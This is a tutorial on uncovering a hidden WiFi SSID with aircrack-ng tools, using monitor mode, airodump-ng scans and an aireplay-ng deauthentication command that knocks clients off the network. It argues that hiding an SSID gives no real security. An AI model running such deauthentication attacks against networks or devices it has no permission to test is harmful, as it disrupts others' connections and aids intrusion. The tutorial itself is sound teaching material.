In this tutorial I will show you, how to find out Hidden WiFi SSIDs with aircrack ng.
It’s recommended that you use Kali Linux, but this can be done with any Linux distribution.
- # – requires given command to be executed with root privileges either directly as a root user or by use of
- $ – given command to be executed as a regular non-privileged user
WiFi security isn’t easy. There’s a ton of potential threats, and even more reported “solutions” flying around out there. One supposed security measure that you can take is hiding your network’s SSID. The guide will demonstrate why that does absolutely nothing to stop attackers.
If you’re running Kali, you already have
aircrack-ng. If you’re on another distribution, and you want to try this out, you’ll have to install it. The name of the package should be the same no matter what you’re running, so use your package manager to grab it.
$ sudo apt install aircrack-ng
Scan For Networks
Before you get started, run
ip a to find the name of your wireless interface. You’re going to need it.
Once you have your wireless interface, disconnect. You can use Aircrack while connected, but you won’t be able to test your network this way. Aircrack will immediately discover your network’s SSID.
As root, run the following command. Substitute your wireless interface in place of
$ sudo airmon-ng start wlan0
That will create a temporary virtual interface for monitoring. It will print out the name of the interface, so make note of that too. It’s usually
mon0. Now, monitor that interface.
$ sudo airodump-ng mon0
The screen will begin to populate with a list of WiFi networks in your area. It will display all of the information that it can in two tables. The top table has the networks. The bottom one contains the clients connecting to those networks. The important parts to note are the BSSID, Channel, and ESSID. Your hidden network will report an ESSID that looks something like this:
. That is the amount of characters in your ESSID.
The bottom table will show you the BSSID(MAC address) of each client and the network that they are seen connecting to, if it’s known.
Narrow Your Scan
There’s a lot of noise in that readout. Cancel your current command and rerun it specifying the BSSID and channel of your network.
$ sudo airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX mon0
This command will show your network and only your network.
Disconnect A Device
You have two options while monitoring your network. You can either wait for a device to connect, and that will immediately populate the SSID of your network, or you can forcefully disconnect one of your devices, and it will broadcast the SSID when it attempts to reconnect.
To disconnect a client, you need to use the
aireplay-ng command, and pass it the BSSID of the network and the BSSID of the client. The
-0 flag tells the command to send a disconnect signal. The number that follows is the amount of requests that it should send.
$ sudo aireplay-ng -0 15 -c CLIENT BSSID -a NETWORK BSSID mon0
Depending on your computer’s configuration, you might need to add the
--ignore-negative-one flag too.
Shortly after you run the command, you will see the network’s SSID fill in in place of the length value.
You’ve now exposed your network’s “hidden” SSID. Clearly, hiding your SSID is a minor inconvenience at best. There’s noting wrong with doing it, but don’t expect to secure your network that way.
Warning: this article is for educational purposes only, and the process should only ever be performed with your own network.